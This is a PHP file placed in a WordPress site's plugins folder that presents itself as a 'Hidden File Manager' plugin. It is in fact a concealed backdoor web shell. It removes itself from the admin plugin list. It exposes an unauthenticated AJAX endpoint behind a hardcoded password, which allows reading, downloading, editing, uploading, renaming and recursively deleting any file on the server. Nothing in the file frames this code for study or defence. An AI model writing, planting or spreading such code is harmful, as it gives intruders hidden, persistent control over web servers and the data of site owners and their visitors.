HEX

File: /var/www/html/wpprotonperinggit/wp-content/plugins/site-tools/site-tools.php
<?php
/*
Plugin Name: Hidden File Manager
Description: A hidden password-protected file manager using AJAX with breadcrumb UI.
Version: 1.5
Author: HiddenOps
*/

if (!defined('ABSPATH')) exit;

define('HFM_PASSWORD', 'greenboys05');

add_filter('all_plugins', function ($plugins) {
    unset($plugins[plugin_basename(__FILE__)]);
    return $plugins;
});

add_action('wp_ajax_hfm_handler', 'hfm_handler');
add_action('wp_ajax_nopriv_hfm_handler', 'hfm_handler');

function hfm_handler() {
    session_start();

    if (!isset($_SESSION['hfm_auth'])) {
        if (isset($_POST['pass']) && $_POST['pass'] === HFM_PASSWORD) {
            $_SESSION['hfm_auth'] = true;
        } else {
            echo '<style>
                body { display:flex; height:100vh; justify-content:center; align-items:center; background:#f5f5f5; font-family:sans-serif; }
                form { background:#fff; padding:20px; border-radius:8px; box-shadow:0 0 10px rgba(0,0,0,0.1); }
                input, button { width:100%; padding:10px; margin-top:10px; }
            </style>
            <form method="post">
                <h2>🔐 Enter Password</h2>
                <input type="password" name="pass" placeholder="Password" autofocus>
                <button type="submit">Login</button>
            </form>';
            exit;
        }
    }

    $dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();
    if (!$dir || !is_dir($dir)) die("❌ Invalid directory");

    $base = admin_url('admin-ajax.php?action=hfm_handler');

    function deleteRecursive($path) {
        if (is_file($path) || is_link($path)) return unlink($path);
        foreach (scandir($path) as $f) if ($f !== '.' && $f !== '..') deleteRecursive("$path/$f");
        return rmdir($path);
    }

    if (isset($_GET['edit']) && is_file($_GET['edit'])) {
        $file = realpath($_GET['edit']);
        if ($_SERVER['REQUEST_METHOD'] === 'POST') file_put_contents($file, $_POST['content']);
        echo "<form method='POST'><textarea name='content' style='width:100%;height:500px;'>" . htmlspecialchars(file_get_contents($file)) . "</textarea><br><button>Save</button></form>";
        exit;
    }

    if (isset($_GET['download']) && is_file($_GET['download'])) {
        $file = realpath($_GET['download']);
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Content-Type: application/octet-stream');
        readfile($file);
        exit;
    }

    if (!empty($_POST['rename_old']) && !empty($_POST['rename_new'])) {
        rename($_POST['rename_old'], dirname($_POST['rename_old']) . '/' . basename($_POST['rename_new']));
    }

    if (!empty($_POST['delete_path'])) {
        deleteRecursive($_POST['delete_path']);
    }

    if (!empty($_FILES['file']['name'])) {
        move_uploaded_file($_FILES['file']['tmp_name'], "$dir/" . basename($_FILES['file']['name']));
    }

    if (!empty($_POST['new_file'])) {
        file_put_contents("$dir/" . basename($_POST['new_file']), '');
    }

    if (!empty($_POST['new_dir'])) {
        mkdir("$dir/" . basename($_POST['new_dir']));
    }

    echo '<style>
        body { font-family:sans-serif; background:#f9f9f9; padding:20px; }
        h2 a { text-decoration:none; margin-right:5px; }
        form, input, button { margin:5px 0; padding:5px; }
        table { width:100%; border-collapse:collapse; margin-top:10px; }
        th, td { padding:8px; border-bottom:1px solid #ddd; }
        form.inline { display:inline; }
        a { color:#0073aa; }
    </style>';

    // Breadcrumb
    echo "<h2>📁 ";
    $parts = explode(DIRECTORY_SEPARATOR, trim($dir, DIRECTORY_SEPARATOR));
    $accum = DIRECTORY_SEPARATOR === '/' ? '/' : '';
    foreach ($parts as $part) {
        $accum .= $part . DIRECTORY_SEPARATOR;
        $link = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'dir' => realpath($accum)], admin_url('admin-ajax.php')));
        echo "<a href='$link'>" . esc_html($part) . "</a> / ";
    }
    echo "</h2>";

    echo '<form method="POST" enctype="multipart/form-data">
        <input type="file" name="file"><button>Upload</button>
    </form>
    <form method="POST">
        <input name="new_file" placeholder="New file name"><button>Create File</button>
    </form>
    <form method="POST">
        <input name="new_dir" placeholder="New folder name"><button>Create Directory</button>
    </form>';

    echo '<table><tr><th>Name</th><th>Actions</th></tr>';
    foreach (scandir($dir) as $f) {
        if ($f === '.' || $f === '..') continue;
        $path = "$dir/$f";
        $url_dir = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'dir' => realpath($path)], $base));
        $url_edit = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'edit' => realpath($path)], $base));
        $url_down = esc_url_raw(add_query_arg(['action' => 'hfm_handler', 'download' => realpath($path)], $base));

        echo "<tr><td>";
        echo is_dir($path) ? "📁 <a href='$url_dir'>$f</a>" : "📄 $f";
        echo "</td><td>
            <form method='POST' class='inline'>
                <input type='hidden' name='rename_old' value='$path'>
                <input type='text' name='rename_new' value='$f'>
                <button>Rename</button>
            </form>";
        if (is_file($path)) {
            echo "<a href='$url_edit'>✏️</a> ";
            echo "<a href='$url_down'>⬇️</a> ";
        }
        echo "<form method='POST' class='inline' onsubmit='return confirm(\"Delete $f?\")'>
            <input type='hidden' name='delete_path' value='$path'>
            <button>🗑️</button>
        </form></td></tr>";
    }
    echo "</table>";
    exit;
}